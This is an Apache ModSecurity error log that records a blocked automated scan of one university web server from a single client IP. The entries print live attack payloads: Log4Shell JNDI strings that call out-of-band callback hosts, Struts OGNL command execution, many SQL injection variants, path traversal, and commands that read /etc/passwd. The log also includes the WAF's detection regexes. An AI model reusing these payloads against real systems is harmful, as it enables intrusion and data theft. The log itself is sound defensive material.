[Tue Aug 29 11:32:13.342993 2023] [:error] [pid 893] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:<?xml version. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22?>< found within ARGS:<?xml version: \\x221.0\\x22 encoding=\\x22UTF-8\\x22?><language>$(cat /etc/passwd>webLib/x)</language>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/SDK/webLanguage"] [unique_id "ZO10zcCo-f0AAAN9sTkAAAAJ"]
[Tue Aug 29 11:32:15.308100 2023] [:error] [pid 1085] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:token. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../ found within ARGS:token: /../../../../../var/lib/tomcat8/webapps/cas/js/lib/buttons/fGh9o.jsp"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/cas/fileUpload/upload"] [unique_id "ZO10z8Co-f0AAAQ9H0wAAAAK"]
[Tue Aug 29 11:32:15.392252 2023] [:error] [pid 893] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:syear. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:syear: 111'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/Side.php"] [unique_id "ZO10z8Co-f0AAAN9sUIAAAAJ"]
[Tue Aug 29 11:32:16.377667 2023] [:error] [pid 1084] [client 143.42.78.27] ModSecurity: XML parser error: XML: Failed parsing document. [hostname "repositoryfeb.unla.ac.id"] [uri "/WebReport/ReportServer"] [unique_id "ZO100MCo-f0AAAQ83R0AAAAI"]
[Tue Aug 29 11:32:16.377710 2023] [:error] [pid 1084] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [hostname "repositoryfeb.unla.ac.id"] [uri "/WebReport/ReportServer"] [unique_id "ZO100MCo-f0AAAQ83R0AAAAI"]
[Tue Aug 29 11:32:16.386832 2023] [:error] [pid 1063] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:author: admin' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(md5(999999999),1,1),NULL,NULL,NULL,NULL-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/author_posts.php"] [unique_id "ZO100MCo-f0AAAQnF9cAAAAF"]
[Tue Aug 29 11:32:17.308366 2023] [:error] [pid 1084] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:author: admin' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(md5(999999999),1,1),NULL,NULL,NULL,NULL-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/cms/author_posts.php"] [unique_id "ZO100cCo-f0AAAQ83SEAAAAI"]
[Tue Aug 29 11:32:18.374990 2023] [:error] [pid 1036] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:key. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe9\\x8c\\xa6'  found within ARGS:key: \\xe9\\x8c\\xa6' union select 1,2,3,4,5,6,7,md5(999999999),9#"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/plus/ajax_street.php"] [unique_id "ZO100sCo-f0AAAQMr2IAAAAu"]
[Tue Aug 29 11:32:18.394715 2023] [:error] [pid 1036] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:x. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xef\\xbf\\xbd'  found within ARGS:x: 11\\xef\\xbf\\xbd' union select 1,2,3,concat(0x3C2F613E20),5,6,7,md5(999999999),9 from qs_admin"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/plus/ajax_street.php"] [unique_id "ZO100sCo-f0AAAQMr2MAAAAu"]
[Tue Aug 29 11:32:21.391360 2023] [:error] [pid 1045] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "Multipart parsing error: Multipart: Final boundary missing."] [severity "CRITICAL"] [hostname "repositoryfeb.unla.ac.id"] [uri "/logupload"] [unique_id "ZO101cCo-f0AAAQV4WYAAAA3"]
[Tue Aug 29 11:32:21.438470 2023] [:error] [pid 893] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: []{\\x22 found within ARGS:name: %{#a=(new java.lang.ProcessBuilder(new java.lang.String[]{\\x22cat\\x22, \\x22/etc/passwd\\x22})).redirectErrorStream(true).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#f=#context.get(\\x22com.opensymphony.xwork2.dispatcher.HttpServletResponse\\x22),#f.getWriter().println(new java.lang.String(#e)),#f.getWriter().flush(),#f.getWriter().close()}\\x0d\\x0a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/user.action"] [unique_id "ZO101cCo-f0AAAN9sVUAAAAJ"]
[Tue Aug 29 11:32:22.351614 2023] [:error] [pid 893] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:shattr. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );-- -\\x22} found within ARGS:shattr: {\\x22id\\x22:\\x221 AND (SELECT 1 FROM(SELECT SLEEP(4))aaaa);-- -\\x22}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO101sCo-f0AAAN9sVYAAAAJ"]
[Tue Aug 29 11:32:23.335804 2023] [:error] [pid 1044] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )))# found within ARGS:username: dd' or extractvalue(0x0a,concat(0x0a,md5(999999999)))#"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO1018Co-f0AAAQUIEQAAAA2"]
[Tue Aug 29 11:32:23.375350 2023] [:error] [pid 854] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:device. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22; found within ARGS:device: aaaaa:a'\\x22;user|s.\\x221337\\x22;"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/esp/cms_changeDeviceContext.esp"] [unique_id "ZO1018Co-f0AAANWgaUAAAAG"]
[Tue Aug 29 11:32:25.381656 2023] [:error] [pid 994] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:c. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:c: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repositoryfeb.unla.ac.id"] [uri "/plus/flink.php"] [unique_id "ZO102cCo-f0AAAPiBr4AAAAB"]
[Tue Aug 29 11:32:26.305508 2023] [:error] [pid 1038] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:type: |cat/etc/passwd||"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repositoryfeb.unla.ac.id"] [uri "/webadm/"] [unique_id "ZO102sCo-f0AAAQOv9wAAAAw"]
[Tue Aug 29 11:32:27.889587 2023] [:error] [pid 1096] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:cmd: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repositoryfeb.unla.ac.id"] [uri "/imc/javax.faces.resource/dynamiccontent.properties.xhtml"] [unique_id "ZO1028Co-f0AAARIwH4AAAAO"]
[Tue Aug 29 11:32:28.428051 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Rule 7fe1c58deef8 [id "973302"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"][line "309"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "repositoryfeb.unla.ac.id"] [uri "/imc/javax.faces.resource/dynamiccontent.properties.xhtml"] [unique_id "ZO103MCo-f0AAAPDoGkAAAAP"]
[Tue Aug 29 11:32:30.309407 2023] [:error] [pid 1099] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:parent. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:parent: \\x22 UNION SELECT NULL,NULL,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION(),md5(999999999)),NULL,NULL,NULL,NULL,NULL-- aa"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/plugins/editors/jckeditor/plugins/jtreelink/dialogs/links.php"] [unique_id "ZO103sCo-f0AAARLXu0AAAAQ"]
[Tue Aug 29 11:32:31.310416 2023] [:error] [pid 1099] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:SPOOLDIR. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:SPOOLDIR: test\\x22.system(id).\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO1038Co-f0AAARLXu4AAAAQ"]
[Tue Aug 29 11:32:32.392395 2023] [:error] [pid 1088] [client 143.42.78.27] ModSecurity: Multipart parsing error: Multipart: Invalid boundary: ------WebKitFormBoundaryl7d1B1aGsV2wcZwF\\xe2\\x80\\x94\\r\\n [hostname "repositoryfeb.unla.ac.id"] [uri "/"] [unique_id "ZO104MCo-f0AAARA7ZwAAAAA"]
[Tue Aug 29 11:32:32.392438 2023] [:error] [pid 1088] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "Multipart parsing error: Multipart: Invalid boundary: ------WebKitFormBoundaryl7d1B1aGsV2wcZwF\\x5cxe2\\x5cx80\\x5cx94\\x5cr\\x5cn"] [severity "CRITICAL"] [hostname "repositoryfeb.unla.ac.id"] [uri "/"] [unique_id "ZO104MCo-f0AAARA7ZwAAAAA"]
[Tue Aug 29 11:32:32.397651 2023] [:error] [pid 1094] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:field. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:field: field:exec:head -1/etc/passwd:null:null"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repositoryfeb.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO104MCo-f0AAARGwdcAAAAL"]
[Tue Aug 29 11:32:35.354716 2023] [:error] [pid 1101] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:${jndi:ldap://127.0.0.1#.${hostName}.cookiename.cjmn8l5jmimk2adbbnlg1qqtao66bs44f.oast.site}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: } found within REQUEST_COOKIES:${jndi:ldap://127.0.0.1#.${hostName}.cookiename.cjmn8l5jmimk2adbbnlg1qqtao66bs44f.oast.site}: ${jndi:ldap://${hostName}.cookievalue.cjmn8l5jmimk2adbbnlgqmh3g4utdx1hi.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "repositoryfeb.unla.ac.id"] [uri "/"] [unique_id "ZO1048Co-f0AAARNk5EAAAAS"]
[Tue Aug 29 11:32:36.378022 2023] [:error] [pid 1038] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'hsvT'='hsvT found within ARGS:username: 1@a.com' AND (SELECT 6427 FROM (SELECT(SLEEP(5)))LwLu) AND 'hsvT'='hsvT"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/login.php"] [unique_id "ZO105MCo-f0AAAQOv@cAAAAw"]
[Tue Aug 29 11:32:37.430999 2023] [:error] [pid 1095] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:text. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:text: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repositoryfeb.unla.ac.id"] [uri "/vendor/htmlawed/htmlawed/htmLawedTest.php"] [unique_id "ZO105cCo-f0AAARH7IEAAAAM"]
[Tue Aug 29 11:32:38.405097 2023] [:error] [pid 1095] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:sccp_id[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:sccp_id[]: 3) AND (SELECT 5921 FROM (SELECT(SLEEP(6)))LxjM) AND (7754=775"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO105sCo-f0AAARH7IwAAAAM"]
[Tue Aug 29 11:32:38.447184 2023] [:error] [pid 1038] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:account_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../ found within ARGS:account_name: /../../../var/www/php/2Udxk4kPA8EFcUByGpoyFb9vAvx.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/v1/backend1"] [unique_id "ZO105sCo-f0AAAQOv-AAAAAw"]
[Tue Aug 29 11:32:40.424545 2023] [:error] [pid 1088] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:j_username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:j_username: ${jndi:ldap://${:-654}${:-523}.${hostName}.postdata.cjmn8l5jmimk2adbbnlg9w6966qebsqky.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/opennms/j_spring_security_check"] [unique_id "ZO106MCo-f0AAARA7bMAAAAA"]
[Tue Aug 29 11:32:42.487522 2023] [:error] [pid 1038] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:language. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:language: ../../../../../../../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/tiki-jsplugin.php"] [unique_id "ZO106sCo-f0AAAQOv-UAAAAw"]
[Tue Aug 29 11:32:46.443233 2023] [:error] [pid 1105] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:g. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../ found within ARGS:g: core-r7rules/../../../hello.php."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/photo/combine.php"] [unique_id "ZO107sCo-f0AAARR220AAAAF"]
[Tue Aug 29 11:32:47.559588 2023] [:error] [pid 1091] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:button. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x83\\x81\\x81[\\x83\\x8b\\x91\\x97\\x90 found within ARGS:button: \\x83\\x81\\x81[\\x83\\x8b\\x91\\x97\\x90M"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/conf_mail.php"] [unique_id "ZO1078Co-f0AAARD1QsAAAAH"]
[Tue Aug 29 11:32:47.599536 2023] [:error] [pid 1108] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: \\x00 found within ARGS:file: ;echo CVE-2023-23333|rev\\x00.zip"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/downloader.php"] [unique_id "ZO1078Co-f0AAARUrokAAAAI"]
[Tue Aug 29 11:32:49.414973 2023] [:error] [pid 1101] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at XML. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: = found within XML: 